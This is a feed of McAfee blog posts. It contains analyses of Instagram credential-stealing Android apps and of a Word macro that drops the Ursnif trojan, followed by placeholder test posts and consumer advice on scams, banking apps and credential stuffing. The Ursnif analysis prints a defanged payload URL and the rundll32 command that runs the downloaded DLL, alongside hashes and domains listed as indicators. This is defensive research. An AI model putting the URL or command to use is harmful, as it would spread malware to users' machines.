We analyzed the application that is being promoted by the domain. The hidden malware does not require many permissions and therefore does not appear to be harmful. When users launch the app, they can only see the below website via the Android Webview.  

Figure 6. Redirect to malicious website via Android Webview

After inspecting the app, we observe the initial code does not contain many features. After showing an advertisement, it will immediately show the malicious website. Malicious activities are performed at the website’s backend rather than within the Android app. 

Figure 7. Simple 2 lines of initial code
Figure 7. Simple 2 lines of initial code

The website says that your transactions are carried out using the Instagram API system with your username and password. It is secure because they use the user’s credentials via Instagram’s official server, not their remote server. 

Contrary to many people’s expectations, we received abnormal login attempts from Turkey a few minutes after using the app. The device logged into the account was not an Instagram server but a personal device model of Huawei as LON-L29. 

Figure 8. Abnormal login attempt notification
Figure 8. Abnormal login attempt notification

As shown above, they don’t use an Instagram API. In addition, as you request followers, the number of the following also increases. In other words, the credentials you provided are used to increase the number of followers of other requesters. Everyone who uses this app has a relationship with each other. Moreover, they will store and use your credentials in their database without your acknowledgement. 

How many users are affected? 

The languages of most communication channels were English, Portuguese, and Hindi. Especially, Hindi was the most common, and most videos had more than 100 views. In the case of a famous YouTuber’s video, they have recorded more than 2,400 views. In addition, our test account had 400 followers in one day. It means that at least 400 users have sent credentials to the malware author. 

Conclusion 

As we mentioned in the opening remarks, many Instagram users want to increase their followers and likes. Unfortunately, attackers are also aware of the desires of these users and use that to attack them. 

Therefore, users who want to install these apps should consider that their credentials may be leaked. In addition, there may be secondary attacks such as credential stuffing (=use of a stolen username and password pairs on another website). Aside from the above cases, there are many unanalyzed similar apps on the Internet. You shouldn’t use suspicious apps to get followers and likes. 

McAfee Mobile Security detects this threat as Android/InstaStealer and protects you from this malware. For more information, visit McAfee Mobile Security. 

Indicators of Compromise 

SHA256: 

  • e292fe54dc15091723aba17abd9b73f647c2d24bba2a671160f02bdd8698ade2 
  • 6f032baa1a6f002fe0d6cf9cecdf7723884c635046efe829bfdf6780472d3907 

Domains: 

  • https[://]insfreefollower.com 

The post Instagram credentials Stealers: Free Followers or Free Likes appeared first on McAfee Blog.

Instagram credentials Stealer: Disguised as Mod App

By McAfee Labs

Authored by Dexter Shin 

McAfee’s Mobile Research Team introduced a new Android malware targeting Instagram users who want to increase their followers or likes in the last post. As we researched more about this threat, we found another malware type that uses different technical methods to steal user’s credentials. The target is users who are not satisfied with the default functions provided by Instagram. Various Instagram modification application already exists for those users on the Internet. The new malware we found pretends to be a popular mod app and steals Instagram credentials. 

Behavior analysis 

Instander is one of the famous Instagram modification applications available for Android devices to help Instagram users access extra helpful features. The mod app supports uploading high-quality images and downloading posted photos and videos. 

The initial screens of this malware and Instander are similar, as shown below. 

Figure 1. Instander legitimate app(Left) and Mmalware(Right) 

Next, this malware requests an account (username or email) and password. Finally, this malware displays an error message regardless of whether the login information is correct. 

Figure 2. Malware requests account and password 

The malware steals the user’s username and password in a very unique way. The main trick is to use the Firebase API. First, the user input value is combined with l@gmail.com. This value and static password(=kamalw20051) are then sent via the Firebase API, createUserWithEmailAndPassword. And next, the password process is the same. After receiving the user’s account and password input, this malware will request it twice. 

Figure 3. Main method to use Firebase API
Figure 3. Main method to use Firebase API

Since we cannot see the dashboard of the malware author, we tested it using the same API. As a result, we checked the user input value in plain text on the dashboard. 

Figure 4. Firebase dashboard built for testing
Figure 4. Firebase dashboard built for testing

According to the Firebase document, createUserWithEmailAndPassword API is to create a new user account associated with the specified email address and password. Because the first parameter is defined as email patterns, the malware author uses the above code to create email patterns regardless of user input values. 

It is an API for creating accounts in the Firebase so that the administrator can check the account name in the Firebase dashboard. The victim’s account and password have been requested as Firebase account name, so it should be seen as plain text without hashing or masking. 

Network traffic 

As an interesting point on the network traffic of the malware, this malware communicates with the Firebase server in Protobuf format in the network. The initial configuration of this Firebase API uses the JSON format. Although the Protobuf format is readable enough, it can be assumed that this malware author intentionally attempts to obfuscate the network traffic through the additional settings. Also, the domain used for data transfer(=www.googleapis.com) is managed by Google. Because it is a domain that is too common and not dangerous, many network filtering and firewall solutions do not detect it. 

Conclusion 

As mentioned, users should always be careful about installing 3rd party apps. Aside from the types of malware we’ve introduced so far, attackers are trying to steal users’ credentials in a variety of ways. Therefore, you should employ security software on your mobile devices and always keep up to date. 

Fortunately, McAfee Mobile Security is able to detect this as Android/InstaStealer and protect you from similar threats. For more information visit  McAfee Mobile Security 

Indicators of Compromise 

SHA256: 

  • 238a040fc53ba1f27c77943be88167d23ed502495fd83f501004356efdc22a39 

The post Instagram credentials Stealer: Disguised as Mod App appeared first on McAfee Blog.

test article – McAfee Partner

By Sushant Khadilkar

test content – McAfee Partner…test content – McAfee Partner…test content – McAfee Partner…test content – McAfee Partner…test content – McAfee Partner…test content – McAfee Partner…

Test

The post test article – McAfee Partner appeared first on McAfee Blog.

Test Test 2

By Jasdev Dhaliwal

https://origin-blogs.mcafee.com/blogs

The post Test Test 2 appeared first on McAfee Blog.

Test Post

By Jasdev Dhaliwal

McAfee Labs have been observing a spike in phishing campaigns that utilize Microsoft office macro capabilities. These malicious documents reach victims via mass spam E-mail campaigns and generally invoke urgency, fear, or similar emotions, leading unsuspecting users to promptly open them. The purpose of these spam operations is to deliver malicious payloads to as many people as possible. 

A recent spam campaign was using malicious word document to download and execute the Ursnif trojan. Ursnif is a high-risk trojan designed to record various sensitive information. It typically archives this sensitive data and sends it back to a command-and-control server. 

 

This blog describes how attackers use document properties and a few other techniques to download and execute the Ursnif trojan. 

Threat Summary 

  • The initial attack vector is a phishing email with a Microsoft Word document attachment. 
  • Upon opening the document, VBA executes a malicious shellcode 
  • Shellcode downloads the remote payload, Ursnif, and invokes rundll32.exe to execute it. 

Infection Chain 

The malware arrives through a phishing email containing a Microsoft Word document as an attachment. When the document is opened and macros are enabled, Word downloads a DLL (Ursnif payload). The Ursnif payload is then executed using rundll32.exe 

 

Figure-1: flowchart of infection chain 

Word Analysis 

Macros are disabled by default and the malware authors are aware of this and hence present an image to entice the victims into enabling them.  

Figure-2: Image of what the user sees upon opening the document 

 

VBA Macro Analysis of Word Document 

Analyzing the sample statically with ‘oleId’ and ‘olevba’ indicates the suspicious vectors.. 

 

Figure-3: Oleid output 

 

 

Figure-4: Olevba output 

 

 

 

 

 

 

The VBA Macro is compatible with x32 and x64 architectures and is highly obfuscated as seen in Figure-5 

 

Figure-5: Obfuscated VBA macro 

 

To get a better understanding of the functionality, we have de-obfuscated the contents in the 2 figures shown below. 

 

Figure-6: De-obfuscated VBA macro (stage 1) 

Figure-7: De-obfuscated VBA macro (stage 2) 

 

 

An interesting characteristic of this sample is that some of the strings like CLSID, URL for downloading Ursnif, and environment variables names are stored in custom document properties in reverse. As shown in Figure-7, VBA function “ActiveDocument.CustomDocumentProperties()” is used to retrieve the properties and uses “StrReverse” to reverse the contents. 

We can see the document properties in Figure-8  

    

Figure-8: Document properties 

 

Payload Download and Execution: 

The malicious macro retrieves hidden shellcode from a custom property named “Company” using the “cdec” function that converts the shellcode from string to decimal/hex value and executes it. The shellcode is shown below. 

 

Figure-9: Raw Company property 

 

The shellcode is  written to memory and the access protection is changed to PAGE_EXECUTE_READWRITE. 

 

Figure-10: Code of VirtualProtect 

 

 

Figure-11: Shellcode’s memory and protection after calling VirtualProtect() 

 

After adding the shellcode in memory, the environment variable containing the malicious URL of Ursnif payload is created. This Environment variable will be later used by the shellcode. 

 

Figure-12: Environment variable set in Winword.exe space 

 

 

The shellcode is executed with the use of the SetTimer API. SetTimer creates a timer with the specified time-out value mentioned and notifies a function when the time is elapsed. The 4th parameter used to call SetTimer is the pointer to the shellcode in memory which will be invoked when the mentioned time is elapsed. 

 

Figure-13: SetTimer function (Execution of shellCode) 

 

The shellcode downloads the file from the URL stored in the environmental variable and stores it as ” y9C4A.tmp.dll ” and executes it with rundll32.exe. 

 

URL  hxxp://docmasterpassb.top/kdv/x7t1QUUADWPEIQyxM6DT3vtrornV4uJcP4GvD9vM/ 
CMD  rundll32 “C:\Users\user\AppData\Local\Temp\y9C4A.tmp.dll”,DllRegisterServer 

 

 

Figure-14: Exports of Downloaded DLL 

 

After successful execution of the shellcode, the environment variable is removed. 

 

Figure-15: Removal of Environment Variable 

IOC 

TYPE  VALUE  PRODUCT  DETECTION NAME 
Main Word Document  6cf97570d317b42ef8bfd4ee4df21d217d5f27b73ff236049d70c37c5337909f  McAfee LiveSafe and Total Protection  X97M/Downloader.CJG 
Downloaded dll  41ae907a2bb73794bb2cff40b429e62305847a3e1a95f188b596f1cf925c4547  McAfee LiveSafe and Total Protection  Ursnif-FULJ 
URL to download dll  hxxp://docmasterpassb.top/kdv/x7t1QUUADWPEIQyxM6DT3vtrornV4uJcP4GvD9vM/  WebAdvisor  Blocked 

 

MITRE Attack Framework 

Technique ID  Tactic  Technique Details  Description 
T1566.001  Initial Access  Spear phishing Attachment  Manual execution by user 
T1059.005  Execution  Visual Basic  Malicious VBA macros 
T1218.011  Defense Evasion  Signed binary abuse  Rundll32.exe is used 
T1027  Defense Evasion  Obfuscation techniques  VBA and powershell base64 executions 
T1086  Execution  Powershell execution  PowerShell command abuse 

 

Conclusion 

Macros are disabled by default in Microsoft Office applications, we suggest keeping it that way unless the document is received from a trusted source. The infection chain discussed in the blog is not limited to Word or Excel. Further threats may use other live-off-the-land tools to download its payloads.  

McAfee customers are protected against the malicious files and sites detailed in this blog with McAfee LiveSafe/Total Protection and McAfee Web Advisor. 

The post Test Post appeared first on McAfee Blog.

How to Know If Your Mobile Finance Apps Are Safe

By McAfee

Mobile banking and finance apps have become increasingly popular in recent years. These apps provide a quick and convenient way to see checking and savings account balances and make and receive payments.  

It’s no surprise that many people use these third-party apps to manage their finances. In 2021, the U.S. saw 573.1 million finance app downloads, a 19% increase from the previous year. 

However, despite its benefits, mobile banking isn’t immune to risks. This article will discuss the safety and security of mobile finance apps and give you a few pointers to protect yourself while using these apps. 

Is mobile banking safe?

Yes, mobile banking is a pretty safe way to manage your finances; however, there can still be some risks associated with it, including fraud and scams 

If you’re careful, there are plenty of ways to protect yourself while using this incredibly easy banking method. 

6 tips to improve mobile finance app security

Here are a few tips to help you improve the safety of your online financial accounts. 

Ensure you’re downloading the official app

A bank’s website will often include links to their mobile apps that provide related mobile banking services, along with details about the app’s features and how users can use it. You should use a trusted platform when installing the app, like the App Store for iPhone or iOS users or the Google Play Store for Android users.  

You should also take time to go through reviews and related information about the app before downloading it to ensure its legitimacy. If you have any doubts, clarify the issue with your bank before downloading what could be a fake banking app. 

Set a strong password 

While this may seem obvious, the reality is that many people don’t pay enough attention to their passwords. To create a strong password, you should use a combination of uppercase and lowercase letters, numbers, and special characters in no particular order or pattern.  

In addition, security experts recommend long, complex passwords to exponentially increase the time it takes to crack them. It also helps to have unique passwords for each of your accounts.  

If you’re concerned about remembering and managing multiple passwords, you can use a reputable and secure password manager like McAfee True Key to store your passwords.  

Use two-factor authentication when possible

Many services nowadays offer two-factor or multifactor authentication. This function refers to the additional layers of security against hackers. On top of a traditional username-password login, users are required to identify themselves with a code that’s sent to their cellphone or email. 

By confirming the user’s identity this way, organizations eliminate a degree of uncertainty. While it isn’t foolproof, two-factor or multifactor authentication helps increase security. It’s worth checking if your finance app offers this feature. 

Avoid public Wi-Fi when using finance apps

Public Wi-Fi networks are convenient in urgent situations; however, they often come with a warning saying the network is unsecured. This means that the network is unencrypted, making it easy for hackers to access your personal information. The best practice is to avoid using public Wi-Fi networks, especially when carrying out any form of financial transaction.  

If you need to make purchases or send and receive money while on the move, though, you’ll want to consider a virtual private network (VPN) like McAfee Secure VPN. The VPN provides a secure network even when using public Wi-Fi by hiding your IP address and encrypting your data. 

Get email/text alerts for potential fraud

The easiest way to protect your finances is to keep a vigilant eye on all of your transactions. However, security notifications from your bank are a great added measure. Most credit card companies allow you to turn on transaction alerts for various services, such as balance transfer requests, international purchases, and exceeded credit limits, which can help you recognize any suspicious activity on your account.  

It’s also important to remember that financial institutions will never contact you over the phone or through email to ask for your banking information. If you receive such a message, it’s most certainly a scam. A common way people get duped is through calls or emails claiming they’ve won a prize and need to share personal account details to receive the money. Never share your bank account details, passwords, or one-time codes with strangers.  

Always check with your bank to confirm any activity that seems out of the ordinary. In addition to alert notifications, banks can also send helpful tips to protect your account against fraud. 

Use McAfee Security for Mobile

McAfee Security for Mobile is an award-winning cybersecurity tool that helps address the issues mentioned above and more. It’ll scan your device for malware, suspicious websites, and unsecured Wi-Fi networks so you can use social media or shop online with complete peace of mind.  

It also comes with other features, like system cleaning services that clean junk from your phone’s storage. These features can boost battery life and help locate your phone if it’s ever stolen or misplaced.  

Are mobile banking apps as safe as online banking?

Mobile and online banking both have their benefits and drawbacks, but which is the safer option? Experts often have varied opinions on the matter.  

Some people believe it might be easier to download malware on a computer unknowingly, as it’s tricky to judge the authenticity of a website or malicious links. Users typically download apps from reputed app stores when using mobile devices, which lowers the risk. 

On the other hand, professionals believe that both methods are equally safe. The choice depends on the network available to the user, as private networks are significantly less susceptible to hacking than public ones. Some users may prefer computers to mobile phones simply because they find it easier to perform tasks on a bigger screen. 

See how McAfee Security for Mobile keeps your device safe

Both internet and mobile banking are convenient and offer a quick way to manage your personal finances, as you don’t have to travel to a physical bank or carry large amounts of cash in your wallet.  

However, while mobile banking is generally considered a safe method of managing your finances, it can have some vulnerabilities that scammers may try to take advantage of. 

Following the tips mentioned above — like using a private network, not sharing personal details with anyone, and using a comprehensive mobile security tool like McAfee Security for Mobile — can make all the difference.  

The tool’s security features include safe browsing, a secure VPN, and antivirus software. This means you can use your mobile finance apps confidently knowing McAfee is looking out for you. 

The post How to Know If Your Mobile Finance Apps Are Safe appeared first on McAfee Blog.

8 Ways to Know If Online Stores Are Safe and Legit

By McAfee

The explosion of e-commerce sites has changed how we shop today, providing access to millions of online stores with almost unlimited selections.  

Just as you would take basic precautions in a brick-and-mortar store — perhaps hiding your PIN number while paying and making sure the business is legitimate — you should also practice safe shopping habits online. 

Here are eight ways you can avoid fake websites and other online scams and ensure that you’re dealing with legitimate companies and safe online stores. 

Use the free McAfee WebAdvisor to check for safe sites

One of the best ways to tell if an online store is legit and avoid debit and credit card scams, domain name and subdomain name takeovers, and other problems is with a free and effective download like McAfee WebAdvisor. 

This smart tool helps you surf and shop with confidence, protecting you from malicious sites that can contain:  

  • Adware: Pop-ups that might be infected with malware 
  • Spyware: Software downloaded without the user’s consent, perhaps passing on sensitive personal information to advertisers or cybercriminals. 
  • Viruses: Pieces of code that can copy themselves and typically have a negative effect, such as slowing down your system or destroying data 
  • Phishing scams: When hackers send duplicitous emails designed to trick people into falling for a scam to reveal financial information, system credentials, or other sensitive data 

McAfee WebAdvisor is a free browser extension that downloads quickly and installs easily, working in the background automatically to protect you from malware and phishing as you surf, search, and enjoy online shopping. 

McAfee WebAdvisor works with Windows 10, 8.1, 8, and 7 (32- and 64-bit) computers and is compatible with these browsers: 

  • Internet Explorer 10.0 or later 
  • Microsoft Edge (Chromium-based) 
  • Microsoft Edge (Windows 10 only; Fall Creators Update required) 
  • Mozilla Firefox 
  • Google Chrome 

Here are other ways to make sure you know when you’re dealing with scammers online.  

Check the padlock in the address bar

When checking an e-commerce site’s credentials, start with the address bar. Often, hackers will use URLs that are very close to the real site’s URL but not quite the same. Look for typos or use Google to see if a search takes you to the same page. Also, look for a padlock icon in the address bar. 

Click the padlock and look at the drop-down menu that provides information, such as if the site has a valid certificate like SSL (verifying that the web address belongs to the company), how many cookies are in use, other site settings, and whether your information is safe when sent to this site. 

The protection is pretty good but not perfect since some cybercriminals have been able to replicate these padlocks or take over legitimate sites that have them. 

Verify the website’s trust seal

Trust seals, such as the TrustedSite certification, are stamps created by a certificate authority (CA) to confirm the legitimacy of a site. A trust seal tells visitors that they are on a safe site and the company that displays the mark prioritizes cybersecurity. Click on it, and you should be taken to a webpage that verifies the authenticity of the trust seal. 

Use the Google Transparency Report

Google’s Safe Browsing technology crawls through billions of web addresses every day on the lookout for unsafe websites. The technology discovers thousands daily — often legitimate sites that have been compromised. Warnings for unsafe sites pop up in your browser and on the Google search engine. You can also search specific URLs to see if a site has been compromised.  

Check the company’s social media presence

It’s worth checking a company on social media to see if they appear to have a genuine following and legitimate posts. The Better Business Bureau (BBB) also has suggestions for spotting fake social media accounts, including those on LinkedIn, Facebook, Twitter, and Instagram. You should look for: 

  • Accounts with poor or no content and stock or recycled images 
  • Poor engagement with followers 
  • Lack of transparency about who runs the account 
  • Phony reviews 
  • Links to phishing scams and malware 

Review the company’s contact info

Another way to test the legitimacy of an online retail store is to check its contact information. Does it have a physical address, phone number, and email contact? Does the email address on the contact page have the company domain name in it, or is it generic (like a Gmail address)? If you send an email, does it get delivered? 

Analyze the overall look of the website

Check to see if the e-commerce site looks as if it has been professionally produced or whether it has been thrown together with slapdash results. Are there typos, grammar errors, poor-quality images, and a sloppy design? Does it have a poorly worded return policy or no return policy at all?  

All the things that undermine the professional appearance and authenticity of a site should be red flags and convince you that you’re on a scam website 

Verify if there are company reviews

If the online company is a legitimate website (not a scam site) and has been around for a while, there should be authentic third-party reviews from previous customers. Review sites include Google My Business, Amazon, and Yelp. 

If the reviews are uniformly bad, on the other hand, you have another type of problem to confront. 

See how McAfee WebAdvisor can keep you safe while shopping online

Since virtual shopping is fast becoming the new norm, it’s important to guard against cybercriminals that are increasingly targeting retailers and their customers. A great way to shop with confidence is to use McAfee WebAdvisor, which is available as a free download. 

The web browser extension works tirelessly in the background to protect you as you browse and buy. Think of it as a gift to yourself so you can use the internet to its full potential while keeping your information protected. 

The post 8 Ways to Know If Online Stores Are Safe and Legit appeared first on McAfee Blog.

Wedding Planning App Users Hacked Before the Big Day

By McAfee

Say you’re getting married. You and your partner have booked the venue, made the seating arrangements, trained your dog to be the ring bearer – and everything is running smoothly. You’ve used a trusty wedding planning website to make everything a breeze. Nothing could ruin this day for you! Except, there’s an uninvited guest. They’re not crashing the wedding and making an awkward toast, but they’ve crashed into your wedding planning website account and now have access to your information.  

There are many things that could go wrong during wedding planning – some of them out of anyone’s control. Maybe the caterer canceled last minute, or the live band is stuck in traffic. Other things may be easily avoided, but you don’t necessarily see them coming. Like a hacker accessing your wedding website and making fraudulent bank transfers right before your big day. 

The Wedding Crasher 

Zola, a wedding planning site allowing couples to create websites, budgets, and gift registries, confirmed that hackers had managed to access the accounts of some of their users, The Verge reported. Once these accounts were infiltrated, hackers used the linked bank accounts or funds held inside the site to make cash transfers. The main method these cybercriminals used was purchasing gift cards through the user’s account and sending them to their email addresses to avoid being easily traced. 

These criminals did not hack the Zola website itself but hacked their users’ accounts with a method called credential stuffing. This is a strategy where hackers take email and password combinations involved in previous breaches of other websites and use them to log into other online profiles. 

You may not even know that your information had been breached previously and that cybercriminals now had your logins for a number of different accounts. Luckily, there are ways to protect yourself and your information from credential stuffing tactics to stop hackers in their tracks. 

Tell Credential Stuffing to Go Stuff It 

Just because you’ve hypothetically grown up and are ready for lifelong commitments doesn’t mean you’ve outgrown those old trusty email addresses and passwords (hello, “basketball4life23”). There’s a level of nostalgia that comes with using the email account that you made in middle school, or maybe you just haven’t gotten around to changing it. However, keeping those old email addresses and logins are doing you more harm than good. Want to make sure that hackers aren’t able to credential stuff your accounts? Here are some trusty tips to keep your information safe. 

Track down and close old accounts 

The best way to know that your old accounts aren’t coming back to haunt you is to make sure those ancient logins are dead and gone. If you don’t remember all the accounts you’ve made and no longer use, don’t sweat it! There are settings through your internet browser that will show you all the accounts and passwords you have saved. A password manager also keeps track of all your credentials, so you don’t have to wrack your brain to try and remember every account you’ve ever made. Once you’ve gone through all your old online accounts you no longer use, close them for good! Though this step will require some time and patience, it’s always better to put in the effort and know your information is safe than to risk it. 

Create strong and unique passwords 

Only having to remember one password for every account may make logging in easier, but ensuring that each of your accounts is unique and secure is worth the extra effort. Having a strong and unique password for each of your accounts helps protect them from credential stuffing and other threats. Varying your passwords across online accounts will assure you that if one of them is breached, the others will remain safe. A password manager can also help with this step, because many of them, such as True Key, can generate strong, random, and unique passwords for every account. 

Update credentials when necessary 

Keep an eye out to make sure that if a website or company you have an account with is breached, you are updating your credentials so that hackers can’t access them. If you see that there has been a hack and your information is vulnerable, immediately update your logins and passwords on that account to keep yourself safe. 

Use multifactor authentication 

Using multifactor authentication adds an extra layer of protection to your accounts. This safety measure requires more than one method of identity verification to access the account, helping to prevent criminals from gaining access to your password-protected information.   

Don’t let cybercriminals get the jump on you! Take the necessary steps to protect your accounts and your personal information. Though combing through your old accounts and deleting them or coming up with a new and unique password for every site login isn’t a glamourous activity, you’ll enjoy greater peace of mind that your accounts are safe, leaving you free to enjoy life’s best moments.  

The post Wedding Planning App Users Hacked Before the Big Day appeared first on McAfee Blog.

How to Recognize an Online Scammer

By McAfee

The great thing about the internet is that there’s room for everyone. The not-so-great part? There’s plenty of room for cybercriminals who are hungry to get their hands on our personal information.  

Fortunately, internet scams don’t have to be a part of your online experience. In this article, we’ll tell you about some of the most common internet schemes and how you can recognize them to keep your identity safe. 

5 tips to help you recognize an online scam

Scams are scary, but you can prevent yourself from falling for one by knowing what to look for. Here are a few tell-tale signs that you’re dealing with a scammer.  

They say you’ve won a huge prize

If you get a message that you’ve won a big sum of cash in a sweepstakes you don’t remember entering, it’s a scam. Scammers may tell you that all you need to do to claim your prize is send them a small fee or give them your banking information.  

When you enter a real sweepstakes or lottery, it’s generally up to you to contact the organizer to claim your prize. Sweepstakes aren’t likely to chase you down to give you money.  

They want you to pay in a certain way

Scammers will often ask you to pay them using gift cards, money orders, cryptocurrency (like Bitcoin), or through a particular money transfer service. Scammers need payments in forms that don’t give consumers protection.  

Gift card payments, for example, are typically not reversible and hard to trace. Legitimate organizations will rarely, if ever, ask you to pay using a specific method, especially gift cards 

When you have to make online payments, it’s a good idea to use a secure service like PayPal. Secure payment systems can have features to keep you safe, like end-to-end encryption.  

They say it’s an emergency

Scammers may try to make you panic by saying you owe money to a government agency and you need to pay them immediately to avoid being arrested. Or the criminal might try to tug at your heartstrings by pretending to be a family member in danger who needs money.  

Criminals want you to pay them or give them your information quickly — before you have a chance to think about it. If someone tries to tell you to pay them immediately in a text message, phone call, or email, they’re likely a scammer 

They say they’re from a government organization or company

Many scammers pretend to be part of government organizations like the Internal Revenue Service (IRS). They’ll claim you owe them money. Criminals can even use technology to make their phone numbers appear legitimate on your caller ID.  

If someone claiming to be part of a government organization contacts you, go to that organization’s official site and find an official support number or email. Contact them to verify the information in the initial message.  

Scammers may also pretend to be businesses, like your utility company. They’ll likely say something to scare you, like your gas will be turned off if you don’t pay them right away. 

The email is littered with grammatical errors

Most legitimate organizations will thoroughly proofread any copy or information they send to consumers. Professional emails are well-written, clear, and error-free. On the other hand, scam emails will likely be full of grammar, spelling, and punctuation errors.  

It might surprise you to know that scammers write sloppy emails on purpose. The idea is that if the reader is attentive enough to spot the grammatical mistakes, they likely won’t fall for the scam 

8 most common online scams to watch out for

There are certain scams that criminals try repeatedly because they’ve worked on so many people. Here are a few of the most common scams you should watch out for.  

Phishing scams

A phishing scam can be a phone or email scam. The criminal sends a message in which they pretend to represent an organization you know. It directs you to a fraud website that collects your sensitive information, like your passwords, Social Security number (SSN), and bank account data. Once the scammer has your personal information, they can use it for personal gain.  

Phishing emails may try anything to get you to click on their fake link. They might claim to be your bank and ask you to log into your account to verify some suspicious activity. Or they could pretend to be a sweepstakes and say you need to fill out a form to claim a large reward.  

During the coronavirus pandemic, new phishing scams have emerged, with scammers claiming to be part of various charities and nonprofits. Sites like Charity Navigator can help you discern real groups from fake ones.  

Travel insurance scams

These scams also became much more prominent during the pandemic. Let’s say you’re preparing to fly to Paris with your family. A scammer sends you a message offering you an insurance policy on any travel plans you might be making. They’ll claim the policy will compensate you if your travel plans fall through for any reason without any extra charges.  

You think it might be a good idea to purchase this type of insurance. Right before leaving for your trip, you have to cancel your plans. You go to collect your insurance money only to realize the insurance company doesn’t exist.  

Real travel insurance from a licensed business generally won’t cover foreseeable events (like travel advisories, government turmoil, or pandemics) unless you buy a Cancel for Any Reason (CFAR) addendum for your policy.  

Grandparent scams

Grandparent scams prey on your instinct to protect your family. The scammer will call or send an email pretending to be a family member in some sort of emergency who needs you to wire them money. The scammer may beg you to act right away and avoid sharing their situation with any other family members. 

For example, the scammer might call and say they’re your grandchild who’s been arrested in Mexico and needs money to pay bail. They’ll say they’re in danger and need you to send funds now to save them.  

If you get a call or an email from an alleged family member requesting money, take the time to make sure they’re actually who they say they are. Never wire transfer money right away or over the phone. Ask them a question that only the family member would know and verify their story with the rest of your family.  

Advance fee scam

You get an email from a prince. They’ve recently inherited a huge fortune from a member of their royal family. Now, the prince needs to keep their money in an American bank account to keep it safe. If you let them store their money in your bank account, you’ll be handsomely rewarded. You just need to send them a small fee to get the money.  

There are several versions of this scam, but the prince iteration is a pretty common one. If you get these types of emails, don’t respond or give out your financial information.  

Tech support scams

Your online experience is rudely interrupted when a pop-up appears telling you there’s a huge virus on your computer. You need to “act fast” and contact the support phone number on the screen. If you don’t, all of your important data will be erased.  

When you call the number, a fake tech support worker asks you for remote access to your device to “fix” the problem. If you give the scammer access to your device, they may steal your personal and financial information or install malware. Worse yet, they’ll probably charge you for it.  

These scams can be pretty elaborate. A scam pop-up may even appear to be from a reputable software company. If you see this type of pop-up, don’t respond to it. Instead, try restarting or turning off your device. If the device doesn’t start back up, search for the support number for the device manufacturer and contact them directly.  

Formjacking and retail scams

Scammers will often pose as popular e-commerce companies by creating fake websites. The fake webpages might offer huge deals on social media. They’ll also likely have a URL close to the real business’s URL but slightly different. 

Sometimes, a criminal is skilled enough to hack the website of a large online retailer. When a scammer infiltrates a retailer’s website, they can redirect where the links on that site lead. This is called formjacking.  

For example, you might go to an e-commerce store to buy a jacket. You find the jacket and put it in your online shopping cart. You click “check out,” and you’re taken to a form that collects your credit card information. What you don’t know is that the checkout form is fake. Your credit card number is going directly to the scammers 

Whenever you’re redirected from a website to make a payment or enter in information, always check the URL. If the form is legitimate, it will have the same URL as the site you were on. A fake form will have a URL that’s close to but not exactly the same as the original site. 

Scareware scams (fake antivirus)

These scams are similar to tech support scams. However, instead of urging you to speak directly with a fake tech support person, their goal is to get you to download a fake antivirus software product (scareware).  

You’ll see a pop-up that says your computer has a virus, malware, or some other problem. The only way to get rid of the problem is to install the security software the pop-up links to. You think you’re downloading antivirus software that will save your computer.  

What you’re actually downloading is malicious software. There are several types of malware. The program might be ransomware that locks up your information until you pay the scammers or spyware that tracks your online activity.  

To avoid this scam, never download antivirus software from a pop-up. You’ll be much better off visiting the website of a reputable company, like McAfee, to download antivirus software 

Credit repair scams

Dealing with credit card debt can be extremely stressful. Scammers know this and try to capitalize off it. They’ll send emails posing as credit experts and tell you they can help you fix your credit or relieve some of your debt. They might even claim they can hide harmful details on your credit report. 

All you have to do is pay a small fee. Of course, after you pay the fee, the “credit expert” disappears without helping you out with your credit at all. Generally, legitimate debt settlement firms won’t charge you upfront. If a credit relief company charges you a fee upfront, that’s a red flag.  

Before you enter into an agreement with any credit service, check out their reputation. Do an online search on the company to see what you can find. If there’s nothing about the credit repair company online, it’s probably fake.  

What can you do if you get scammed online?

Admitting that you’ve fallen for an online scam can be embarrassing. But reporting a scammer can help stop them from taking advantage of anyone else. If you’ve been the victim of an online scam, try contacting your local police department and filing a report with the Federal Trade Commission (FTC).  

Several other law enforcement organizations handle different types of fraud. Here are a few examples of institutions that can help you report scams 

Discover how McAfee can keep you and your info safe online

Fraudsters shouldn’t stop you from enjoying your time online. Just by learning to spot an online scam, you can greatly strengthen your immunity to cybercrimes 

For an even greater internet experience, you’ll want the right tools to protect yourself online. McAfee’s Total Protection services can help you confidently surf the web by providing all-in-one protection for your personal info and privacy. This includes identity protection — which comes with 24/7 monitoring of your email addresses and bank accounts — and antivirus software to help safeguard your internet connection.  

Get the peace of mind that comes with McAfee having your back. 

The post How to Recognize an Online Scammer appeared first on McAfee Blog.

Types of Online Banking Scams and How to Avoid Them

By McAfee

Online banking puts the ability to pay bills, check your balance, or transfer money at your fingertips. Unfortunately, it can also make you vulnerable to scammers who may try to trick you into giving them access to your account.  

By remaining vigilant, though, you can avoid common scams. This article discusses mobile banking scams and how to avoid them. 

Most common online banking scams

Online banking can be super convenient — for both you and cybercriminals. And hackers may use a variety of tactics to gain access to your accounts. Most of these involve tricking you into giving them your account information. 

Phishing scams

With this type of online scam, fraudsters may send a text message or email that looks like it’s from your bank. Often, the message will ask for immediate action, such as confirming your information to keep the account from being closed.  

The message might even include a link to the bank, but it actually goes to a fraudulent website designed to look like the bank’s website. When you enter your account information, the scammers record it. 

Sometimes, the email asks you to call a fake customer service number. If you do, you’ll speak to someone who tries to get you to give over sensitive information, like your date of birth or Social Security number (SSN). 

Occasionally, scammers already have some of your personal information. To gain your trust, they might mention personal details like your date of birth or the last four digits of your SSN. They may have learned this information from your social media posts or accessed it in a data breach. 

Cracking passwords

Another way hackers may try to access your bank account is to steal or guess your password. If they can log into your account, they can use your sensitive information for personal gain, otherwise known as identity theft. They can then open credit card accounts in your name, purchase merchandise, or transfer money out of your account. 

Cybercriminals use technology to guess billions of passwords per second. However, it’s more difficult to guess long passwords with a combination of letters and numbers.  

For example, a computer can instantly guess a password consisting of eight letters. Adding one uppercase letter extends the time it takes to crack a password to 22 minutes. In contrast, a 12-character password with an uppercase letter, a number, and a symbol would take the computer 34,000 years to crack. 

Computer viruses

When you click a link or attachment in an email or download fake antivirus software, your device can become infected with malicious software or malware. A virus can let hackers view data from your device and use it to access your financial information or bank accounts 

Consider getting antivirus software to help protect your devices, like what’s offered through McAfee Total Protection. Our award-winning antivirus software provides 24/7 real-time threat protection against online threats like malware, viruses, ransomware, and phishing, across Apple and Android systems. 

Targeting computers on public Wi-Fi networks

Public Wi-Fi gives you convenient, free access to the internet in restaurants, airports, and department stores. But it can also be easy for hackers to see your private information on an open network that doesn’t require a password.  

